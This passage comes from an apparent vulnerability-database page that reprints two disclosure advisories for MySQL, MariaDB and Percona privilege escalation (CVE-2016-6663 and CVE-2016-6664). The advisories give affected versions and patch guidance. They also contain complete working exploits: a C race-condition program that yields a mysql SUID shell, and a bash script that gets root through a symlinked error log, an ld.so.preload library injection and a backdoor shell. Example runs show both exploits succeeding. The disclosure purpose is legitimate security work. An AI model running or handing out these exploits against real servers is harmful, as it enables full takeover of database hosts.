{st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 [pid 1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0 [pid 1463] unlink("/tmp/disktable/poctab1.MYD") = 0 [pid 1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0 ``` The first call: ``` [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 ``` was found to check file permissions of poctab1.MYD table which are then copied with chmod() to the newly created poctab1.TMD temporary file containing the repaired table. The code is vulnerable to Race Condition between the call: ``` [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 ``` and ``` [pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 ``` If an attacker managed to unlink the temporary table poctab1.TMD and replace it with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), they would be able to apply arbitrary permissions on the data directory. The attacker would be able to control the set of permissions by pre-setting them on poctab1.MYD file before executing the REPAIR TABLE statement. For example, by setting the permissions of poctab1.MYD to 777 the data directory would become readable and writable to the attacker. Obtaining mysql-suid shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Apart from gaining access to arbitrary mysql files, the attacker could also achieve arbitrary code execution in the context of mysql user (mysql shell). This could be done by first pre-setting permissions on poctab1.MYD to 04777 (suid), and winning the race so that the permissions get applied on a copy of a bash shell file through the vulnerable chmod() call effectively creating a shell that elevates their permissions after execution. There is only one problem. Their suid shell would remain to be owned by the attacker's user id and not 'mysql' user. To elevate their privileges, attacker would need to copy the bash shell to a mysql-owned table file which are owned by mysql user. However mysql table files are not writable by other users making it impossible for attacker to save the shell. This could be bypassed if attacker created a specially crafted directory with a group sticky bit and then created a second table named 'poctab2' as follows: attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/ attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/ drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/ mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; Query OK, 0 rows affected (0.00 sec) attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/ total 0 -rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD -rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions of the group on disktable directory) has 'mysql' as the owner but 'attacker' as the group. Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file and preserve the file owner. Finally, they could exploit the Race Condition again and have SUID + exec permissions applied on poctab2.MYD which would then allow them to execute the suid shell with elevated privileges of the mysql user. From mysql to root ~~~~~~~~~~~~~~~~~~~~~~~~ After obtaining a mysql suid shell, attackers could then exploit one of the other MySQL vulnerabilities discovered by the author of this advisory: CVE-2016-6662 or CVE-2016-6664 (Oracle CVE-2016-5617) to escalate their privileges from mysql user to root system user. V. PROOF OF CONCEPT EXPLOIT ------------------------- ------------------[ mysql-privesc-race.c ]-------------------- ``` /* MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 Discovered/Coded by: Dawid Golunski dawid[at]legalhackers.com @dawid_golunski http://legalhackers.com Compile: gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient Note: * On RedHat-based systems you might need to change /tmp to another public directory * For testing purposes only. Do no harm. Full advisory URL: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html */ #include <fcntl.h> #include <grp.h> #include <mysql.h> #include <pwd.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/inotify.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define EXP_PATH "/tmp/mysql_privesc_exploit" #define EXP_DIRN "mysql_privesc_exploit" #define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" #define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" #define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" #define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary MYSQL *conn; // DB handles MYSQL_RES *res; MYSQL_ROW row; unsigned long cnt; void intro() { printf( "\033[94m\n" "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n" "mysql-privesc-race.c (ver. 1.0)\n\n" "CVE-2016-6663 / OCVE-2016-5616\n\n" "For testing purposes only. Do no harm.\n\n" "Discovered/Coded by:\n\n" "Dawid Golunski \n" "http://legalhackers.com" "\033[0m\n\n"); } void usage(char *argv0) { intro(); printf("Usage:\n\n%s user pass db_host database\n\n", argv0); } void mysql_cmd(char *sql_cmd, int silent) { if (!silent) { printf("%s \n", sql_cmd); } if (mysql_query(conn, sql_cmd)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } res = mysql_store_result(conn); if (res>0) mysql_free_result(res); } int main(int argc,char **argv) { int randomnum = 0; int io_notified = 0; int myd_handle; int wpid; int is_shell_suid=0; pid_t pid; int status; struct stat st; /* io notify */ int fd; int ret; char buf[4096] __attribute__((aligned(8))); int num_read; struct inotify_event *event; /* credentials */ char *user = argv[1]; char *password = argv[2]; char *db_host = argv[3]; char *database = argv[4]; // Disable buffering of stdout setvbuf(stdout, NULL, _IONBF, 0); // Get the params if (argc!=5) { usage(argv[0]); exit(1); } intro(); // Show initial privileges printf("\n[+] Starting the exploit as: \n"); system("id"); // Connect to the database server with provided credentials printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host); conn = mysql_init(NULL); if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } // Prepare tmp dir printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN); umask(000); system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); system("chmod g+s /tmp/" EXP_DIRN ); // Prepare exploit tables :) printf("\n[+] Creating mysql tables \n\n"); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n"); system("cp /bin/bash " SUID_SHELL); system("ls -l " SUID_SHELL); // Use inotify to get the timing right fd = inotify_init(); if (fd < 0) { printf("failed to inotify_init\n"); return -1; } ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ printf("\n[+] Entering the race loop... Hang in there...\n"); while ( is_shell_suid != 1 ) { cnt++; if ( (cnt % 100) == 0 ) { printf("->"); //fflush(stdout); } /* Create empty file , remove if already exists */ unlink(MYSQL_TEMP_FILE); unlink(MYSQL_TAB_FILE); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); /* random num if needed */ srand ( time(NULL) ); randomnum = ( rand() % MAX_DELAY ); // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink pid = fork(); if (pid < 0) { fprintf(stderr, "Fork failed :(\n"); } /* Child process - executes REPAIR TABLE SQL statement */ if (pid == 0) { usleep(500); unlink(MYSQL_TEMP_FILE); mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); // child stops here exit(0); } /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ if (pid > 0 ) { io_notified = 0; while (1) { int processed = 0; ret = read(fd, buf, sizeof(buf)); if (ret < 0) { break; } while (processed < ret) { event = (struct inotify_event *)(buf + processed); if (event->mask & IN_CLOSE) { if (!strcmp(event->name, "exploit_table.TMD")) { //usleep(randomnum); // Set the .MYD permissions to suid+exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE); myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); close(myd_handle); chmod(MYSQL_TAB_FILE, 04777); // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec unlink(MYSQL_TEMP_FILE); symlink(SUID_SHELL, MYSQL_TEMP_FILE); io_notified=1; } } processed += sizeof(struct inotify_event); } if (io_notified) { break; } } waitpid(pid, &status, 0); } // Check if SUID bit was set at the end of this attempt if ( lstat(SUID_SHELL, &st) == 0 ) { if (st.st_mode & S_ISUID) { is_shell_suid = 1; } } } printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt); system("ls -l " SUID_SHELL); printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n"); system(SUID_SHELL " -p -i "); //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); /* close MySQL connection and exit */ printf("\n[+] Job done. Exiting\n\n"); mysql_close(conn); return 0; } ``` Example run: ~~~~~~~~~~~~~~ ``` attacker@xenial:~/mysql-exploit$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.1 LTS Release: 16.04 Codename: xenial attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv ii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries ii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files attacker@xenial:~/mysql-exploit$ id uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' +-----------------------------------------------------------------------------------------------------------------+ | Grants for attacker@localhost | +-----------------------------------------------------------------------------------------------------------------+ | GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | | GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | +-----------------------------------------------------------------------------------------------------------------+ attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as: uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) [+] Connecting to the database `pocdb` as attacker@localhost [+] Creating exploit temp directory /tmp/mysql_privesc_exploit [+] Creating mysql tables DROP TABLE IF EXISTS exploit_table DROP TABLE IF EXISTS mysql_suid_shell CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' [+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : -rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Entering the race loop... Hang in there... [+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: -rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Spawning the mysql SUID shell now... Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) mysql_suid_shell.MYD-4.3$ whoami mysql mysql_suid_shell.MYD-4.3$ id uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* -rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm -rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD -rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI mysql_suid_shell.MYD-4.3$ exit exit [+] Job done. Exiting real 0m28.999s user 0m0.016s sys 0m0.016s ``` Video PoC: ~~~~~~~~~~~~ http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. BUSINESS IMPACT ------------------------- Malicious local users with DB access granted a common set of privileges (SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary code and escalate their privileges to mysql system user. This would allow them to gain access to all of the databases stored on the server as well as exploit CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges to root system user (rootshell) and fully compromise the target server. This vulnerability could for example be exploited by malicious users in a shared hosting environment where each user is supposed to have access to only one database assigned to them. It could also be exploited by attackers who have managed to find a vulnerability in a website and gained access to the target system as a low-privileged user (such as apache/www-data). VII. SYSTEMS AFFECTED ------------------------- MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 When checking if your system contains the patches, note that this vulnerability has been known under two CVE IDs: CVE-2016-6663 CVE-2016-5616 CVE-2016-6663 is the original CVE that was agreed to be used by all the affected vendors. The issue was however mentioned in Oracle CPU mistakenly under a new CVE of CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663. VIII. SOLUTION ------------------------- MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in advance which allowed them to produce patches for this vulnerability before disclosure. Update to security releases issued by the vendor. As a temporary mitigation, you can disable symbolic link support in the database server configuration with the following my.cnf config setting: symbolic-links = 0 Nevertheless, an update to a patched release is recommended. IX. REFERENCES ------------------------- http://legalhackers.com This advisory (CVE-2016-6663 / OCVE-2016-5616): http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html Exploit (mysql-privesc-race.c) source code URL: http://legalhackers.com/exploits/mysql-privesc-race.c Video PoC: http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html Advisory for CVE-2016-6664 / OCVE-2016-5617: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html Vendor updates: http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL http://www.mysql.com/ https://mariadb.org/about/ https://mariadb.com/kb/en/mdb-5552-rn/ https://mariadb.com/kb/en/mdb-10118-rn/ https://mariadb.com/kb/en/mdb-10028-rn/ https://www.percona.com/software X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 01.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
    idSSV:92510
    last seen2017-11-19
    modified2016-11-02
    published2016-11-02
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-92510
    titleMySQL / MariaDB / PerconaDB 提权/条件竞争漏洞(CVE-2016-6663)
  • bulletinFamilyexploit
    descriptionI. VULNERABILITY ------------------------- MySQL / MariaDB / PerconaDB - Root Privilege Escalation MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 II. BACKGROUND ------------------------- MySQL: "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." http://www.mysql.com/products/ http://www.mysql.com/why-mysql/ -- MariaDB: "MariaDB is one of the most popular database servers in the world. Its made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases." https://mariadb.org/about/ -- PerconaDB: "Percona Server for MySQL is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server芒鈧劉s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability." https://www.percona.com/software/mysql-database/percona-server III. INTRODUCTION ------------------------- MySQL-based databases including MySQL, MariaDB and PerconaDB are affected by a privilege escalation vulnerability which can let attackers who have gained access to mysql system user to further escalate their privileges to root user allowing them to fully compromise the system. The vulnerability stems from unsafe file handling of error logs and other files. IV. DESCRIPTION ------------------------- The error.log file on most default installations of MySQL/PerconaDB/MariaDB databases is stored either in /var/log/mysql or /var/lib/mysql directory. The permissions on the file and directory look as follows: ``` root@trusty:/var/lib/mysql# ls -la /var/log/mysql total 468 drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 . drwxrwxr-x 36 root syslog 4096 Sep 11 06:25 .. -rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log root@trusty:/var/lib/mysql# ls -lad /var/log/mysql drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql ``` mysqld_safe wrapper that is normally used for starting MySQL daemon and creating/reopening the error.log performs certain unsafe file operations that may allow attackers to gain root privileges. The wrapper script contains a 'while' loop shown below which monitors the mysqld process and performs a restart in case of the process failure. The restart involves re-creation of the error.log file if syslog logging has not been configured instead of error log files (file-based logging is the default setting on most installations). --------[ mysqld_safe ]-------- ``` [...] while true do rm -f "$pid_file" # Some extra safety start_time=`date +%M%S` eval_log_error "$cmd" if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then touch "$err_log" # hypothetical: log was renamed but not chown $user "$err_log" # flushed yet. we'd recreate it with chmod "$fmode" "$err_log" # wrong owner next time we log, so set fi # it up correctly while we can! [...] ``` ------------------------------- As can be seen, the error.log file is created (touch) and chowned to the user running the mysqld daemon (typically 'mysql'). The operation is vulnerable to a symlink attack. Attackers who obtained access to mysql account, through CVE-2016-6663 vulnerability described at: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html would gain access to /var/log or /var/lib/mysql directories (owned by mysql user) and could therefore easily remove the error.log file and replace it with a symlink to an arbitrary system file and escalate privileges. The privilege escalation could be triggered instantly (without the need to wait for mysql service restart/reboot) by attackers having 'mysql' account by simply killing the mysqld child process (launched by the mysqld_safe wrapper). When the mysqld process gets terminated, the wrapper will then re-itertate the loop shown above and immediately create a mysql-owned file in the location specified by the attacker in the symlink thus allowing attackers to quickly escalate their privileges. V. PROOF OF CONCEPT EXPLOIT ------------------------- -------[ mysql-chowned.sh ]------ ``` #!/bin/bash -p # # MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit # mysql-chowned.sh (ver. 1.0) # # CVE-2016-6664 / OCVE-2016-5617 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # This PoC exploit allows attackers to (instantly) escalate their privileges # from mysql system account to root through unsafe error log handling. # The exploit requires that file-based logging has been configured (default). # To confirm that syslog logging has not been enabled instead use: # grep -r syslog /etc/mysql # which should return no results. # # This exploit can be chained with the following vulnerability: # CVE-2016-6663 / OCVE-2016-5616 # which allows attackers to gain access to mysql system account (mysql shell). # # In case database server has been configured with syslog you may also use: # CVE-2016-6662 as an alternative to this exploit. # # Usage: # ./mysql-chowned.sh path_to_error.log # # # See the full advisory for details at: # https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html # # Video PoC: # https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/mysqlrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0 } #intro echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" id | grep -q mysql if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi echo -e "\n[+] Target MySQL log file set to $ERRORLOG" # [ Active exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); //unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file to /etc rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" # Wait for MySQL to re-open the logs echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER if [ "$THE_ANSWER" = "y" ]; then echo -e "Got it. Executing 'killall mysqld' now..." killall mysqld fi while :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done # /etc/ dir should be owned by mysql user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" chmod 755 /etc/ld.so.preload # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo 2>/dev/null >/dev/null #while :; do # sleep 0.1 # ps aux | grep mysqld | grep -q 'log-error' # if [ $? -eq 0 ]; then # break; # fi #done # Check for the rootshell ls -l $BACKDOORPATH ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi # Execute the rootshell echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" $BACKDOORPATH -p # Job done. cleanexit 0 ``` ------------EOF------------------ Example run ~~~~~~~~~~~~~~~~ ``` mysql_suid_shell.MYD-4.3$ whoami mysql omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server iU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server iF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit mysql-chowned.sh (ver. 1.0) CVE-2016-6664 / OCVE-2016-5617 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) [+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh [+] Symlink created at: lrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload [+] Waiting for MySQL to re-open the logs/MySQL service restart... Do you want to kill mysqld process to instantly get root? :) ? [y/n] y Got it. Executing 'killall mysqld' now... [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: -rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! -rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh Got root! The database server has been ch-OWNED ! [+] Spawning the rootshell /tmp/mysqlrootsh now! mysqlrootsh-4.3# whoami root mysqlrootsh-4.3# exit exit [+] Cleaning up... [+] Job done. Exiting with code 0 ``` Video PoC: ~~~~~~~~~~~~~ http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. BUSINESS IMPACT ------------------------- Although the severity of this issue is lower on its own (attackers need to gain access to mysql system user), the vulnerability could easily be combined with the CVE-2016-6663 issue. The combination of the two would effectively allow low privileged local database users to escalate their system privileges to root system account and allow them to fully compromise the server which increases the severity of this issue. VII. SYSTEMS AFFECTED ------------------------- MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 VIII. SOLUTION ------------------------- Vendors have released patches after private disclosure. Update to the latest version of your DBMS. IX. REFERENCES ------------------------- http://legalhackers.com This advisory: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html Exploit source code: http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh Related mysql vulnerabilities discovered by the author of thid advisory that can be chained with the CVE-2016-6664 vulnerability: CVE-2016-6663: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html CVE-2016-6662: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Video PoC: http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html CVE-2016-6664 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664 Oracle CPU: 